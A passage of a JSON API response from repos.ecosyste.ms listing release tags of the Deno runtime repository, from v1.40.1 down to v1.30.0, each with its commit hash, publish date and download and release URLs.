url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/host